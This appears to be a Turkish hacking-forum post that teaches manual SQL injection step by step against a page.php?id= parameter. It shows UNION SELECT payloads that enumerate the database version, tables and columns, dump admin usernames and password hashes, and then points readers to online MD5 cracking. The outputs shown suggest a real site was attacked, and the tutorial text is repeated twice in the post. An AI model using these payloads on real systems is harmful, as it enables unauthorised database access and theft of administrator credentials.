RedEnergy
Altın Üye
- Katılım
- 31 Mart 2021
- Mesajlar
- 647
- Tepkime puanı
- 1,262
- İlgi Alanlarınız
- Sosyal medya uzmanlığı,Webtasarım
- Cinsiyet
-
- Erkek
Evet şimdi manuel SQL Injection nasıl sömürülür başlayalım.
site.com/page.php?id=5 adresine gidiyorum.
Sonuna bir tırnak (‘) koydum.
Şimdi kolon sayısını bulacağız.
site.com/page.php?id=5+order+by+15 yazıyorum ve site
Error :Unknown column ’15’ in ‘order clause’
hatası veriyor. Bu sayıyı düşürmemiz gerekiyor. Sırasıyla düşüyoruz.
5’e geldiğimde hata almıyorum. Demek ki kolon sayımız 5. Bu siteyle alakalı bir durum.
Her sitede farklıdır. Sizler de kendi test ettiğiniz sitede deneyiniz.
Site.com/page.php?id=5+union+select+1,2,3,4,5
bu sefer union+select yazdık.
Site.com/page.php?id=-5+union+select+1,version(),3,4,5
Şimdiyse 2 yerine version() yazıyoruz. İsterseniz 3 yerine de yazabilirsiniz farketmez.
Karşıma böyle bir yazı geldi. Versiyonumuzu öğrenmiş olduk.
Site.com/page.php?id=-5+union+select+1,database(),3,4,5 yazıyoruz ve karşımıza databasemizin ismi geliyor.
https://www.rapidtables.com/convert/number/ascii-to-hex.html
Bu siteye gidip çekmek istediğimiz veri tabanı adını hex koduna dönüştürüyoruz.
63756c6f736d75735f6d757363756c başına 0x koyuyoruz.
Ben admin tablosunu çekeceğim için admin yazısını alıp hex koduna çevirip başına 0x koyuyorum.
Evet karşımıza bunlar geldi.
Site.com/page.php?id=-5+union+select+1,(user_id),(password),4,5+from+admin
user_id veya password yerine entry_id,user_id,password,type,status buradan birini yazabilirsiniz.
Veriler karşımıza geldi.
Altta ki şifremiz md5 ile şifrelenmiş bir şifre.
https://crackstation.net/ gibi sitelerden bulmaya çalışabilirsiniz.
Manuel SQL İnjection konumuzun sonuna geldik. Okuduğunuz için teşekkürler.
site.com/page.php?id=5 adresine gidiyorum.
Sonuna bir tırnak (‘) koydum.
Evet hata aldık. Sitemizde bir SQL injection var.Error :You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”’ at line 1
Şimdi kolon sayısını bulacağız.
site.com/page.php?id=5+order+by+15 yazıyorum ve site
Error :Unknown column ’15’ in ‘order clause’
hatası veriyor. Bu sayıyı düşürmemiz gerekiyor. Sırasıyla düşüyoruz.
- site.com/page.php?id=5+order+by+14 hata
- site.com/page.php?id=5+order+by+13 hata
- site.com/page.php?id=5+order+by+12 hata
- site.com/page.php?id=5+order+by+11 hata
- site.com/page.php?id=5+order+by+10 hata
5’e geldiğimde hata almıyorum. Demek ki kolon sayımız 5. Bu siteyle alakalı bir durum.
Her sitede farklıdır. Sizler de kendi test ettiğiniz sitede deneyiniz.
Site.com/page.php?id=5+union+select+1,2,3,4,5
bu sefer union+select yazdık.
Site.com/page.php?id=-5+union+select+1,version(),3,4,5
Şimdiyse 2 yerine version() yazıyoruz. İsterseniz 3 yerine de yazabilirsiniz farketmez.
10.1.48-MariaDB |
Site.com/page.php?id=-5+union+select+1,database(),3,4,5 yazıyoruz ve karşımıza databasemizin ismi geliyor.
https://www.rapidtables.com/convert/number/ascii-to-hex.html
Bu siteye gidip çekmek istediğimiz veri tabanı adını hex koduna dönüştürüyoruz.
63756c6f736d75735f6d757363756c başına 0x koyuyoruz.
evet tablolarımız gözüktü.site.com/page.php?id=-5+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=0x63756C6F736D75735F6D757363756C
admin,caseofmonth,category,delegates,documents,faculty,gallery,homepageimg ,img_category,imggal,imguploads,ipadd,loginip,message,news,newsletter,page, pages,photo,quicklinks,slider,socialmedia,testimonials,videos |
Ben admin tablosunu çekeceğim için admin yazısını alıp hex koduna çevirip başına 0x koyuyorum.
Site.com/page.php?id=-5+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_schema=0x63756C6F736D75735F6D757363756C+and+table_name=0x61646D696E
entry_id,user_id,password,type,status |
Site.com/page.php?id=-5+union+select+1,(user_id),(password),4,5+from+admin
user_id veya password yerine entry_id,user_id,password,type,status buradan birini yazabilirsiniz.
Veriler karşımıza geldi.
Altta ki şifremiz md5 ile şifrelenmiş bir şifre.
https://crackstation.net/ gibi sitelerden bulmaya çalışabilirsiniz.
Manuel SQL İnjection konumuzun sonuna geldik. Okuduğunuz için teşekkürler.